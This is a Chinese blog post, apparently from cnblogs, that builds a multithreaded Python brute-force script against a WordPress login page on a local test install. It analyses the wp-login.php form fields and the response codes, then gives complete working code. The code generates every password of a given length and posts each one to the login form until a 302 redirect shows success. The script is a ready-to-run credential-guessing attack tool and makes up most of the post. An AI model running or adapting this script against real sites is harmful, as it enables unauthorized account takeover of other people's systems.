• 基于python的多线程暴破脚本


    搭建了一个本地wordpress,写一个基于多线程异步I/O的暴力破解

    1 测试

    提交错误的表单数据时,查看请求参数

    登录时发送的cookie

    2 登录分析

    经过多次测试,发现无论是输入正确的密码还是错误的密码,这些登录需要提交的参数是不会改变的。并且只要登录成功,服务器一定会返回包含sessionid的cookie。整理后的发送参数如下:

    参数

    log:用户名
    pwd:密码
    wp-submit:Log In(定值)
    redirect_to:http://localhost/wordpress/wp-admin
    test_cookie:1(定值)

    wordpress_test_cookie:WP Cookie check(定值)

    3 思路分析

    口令集:
    暴力破解一般是使用口令字符的全部排列组合,所使用的口令集可使用itertool模块的笛卡尔积生成方法(product)来生成。当然这样计算开销比较大,适合口令长度比较小的情况。当然也可以使用字典,那么就可能需要结合用户信息定制字典。

    数据结构:
    使用队列来存储口令集是个很不错的选择,能够极大得降低数据读取的复杂性。

    模拟登陆:
    通过requests模块发送post请求,来模拟登陆,发送的参数与cookie依照上面的分析来发送即可。

    登陆:
    登陆失败,只是本地刷新,所以响应码200。登陆成功后,跳转到管理员后台,返回响应码302。

    优化破解性能:
    可使用异步I/O来进行破解过程的优化,待实现。

    4 源码

    # !/usr/bin/env python
    # -*- coding:utf-8 -*-
    import requests
    import sys
    import itertools
    import Queue
    import threading
    import time
    
    
    class Bruter(object):
        def __init__(self, user, characters, pwd_len, threads):
            self.user = user
            self.found = False # 存放破解结果,破解成功为True,失败为False
            self.threads = threads
            print '构建待测试口令队列中...'
            self.pwd_queue = Queue.Queue()
            for pwd in list(itertools.product(characters, repeat=pwd_len)):
                self.pwd_queue.put(''.join(pwd))
            self.result = None
            print '构建成功!'
    
        def brute(self):
            for i in range(self.threads):
                t = threading.Thread(target=self.__web_bruter)
                t.start()
                print '破解线程-->%s 启动' % t.ident
            while (not self.pwd_queue.empty()): # 剩余口令集判断
                sys.stdout.write('
     进度: 还剩余%s个口令 (每1s刷新)' % self.pwd_queue.qsize())
                sys.stdout.flush()
                time.sleep(1)
                print '
    破解完毕'
    
        def __login(self, pwd):
            url = 'http://localhost/wordpress/wp-login.php'
            values = {'log': self.user, 'pwd': pwd, 'wp-submit': 'Log In',
                      'redirect_to': 'http://localhost/wordpress/wp-admin', 'test_cookie': '1'}
            my_cookie = {'wordpress_test_cookie': 'WP Cookie check'}
            r = requests.post(url, data=values, cookies=my_cookie, allow_redirects=False) # 禁用重定向,以便后边判断登陆状态
            if r.status_code == 302: # 登陆状态判断
                return True
            return False
    
        def __web_bruter(self): # 破解子线程函数
            while not self.pwd_queue.empty() and not self.found:
                pwd_test = self.pwd_queue.get()
                if self.__login(pwd_test):
                    self.found = True
                    self.result = pwd_test
                    print '破解 %s 成功,密码为: %s' % (self.user, pwd_test)
                else:
                    self.found = False
    
    
    if __name__ == '__main__':
        if len(sys.argv) != 5:
            print '用法 : cmd [用户名] [密码字符] [密码长度] [线程数]'
            exit(0)
        b = Bruter(sys.argv[1], sys.argv[2], int(sys.argv[3]), int(sys.argv[4]))
        b.brute()
        print b.result
    
  • 相关阅读:
    一键保存网页为PDF
    Redis使用总结之与Memcached异同
    wxWidgets的安装编译、相关配置、问题分析处理
    python抓取网页图片
    bootstrap插件学习-bootstrap.popover.js
    CC.NET模板简化配置
    密码技术应用系列之开篇
    【Cocos2d-X开发学习笔记】第05期:渲染框架之布景层类(CCLayer)的使用
    ImageMagick还是GraphicsMagick?
    RESTClient 控件 从服务器获得数据集 REST
  • 原文地址:https://www.cnblogs.com/whatisfantasy/p/6436076.html
Copyright © 2020-2023  润新知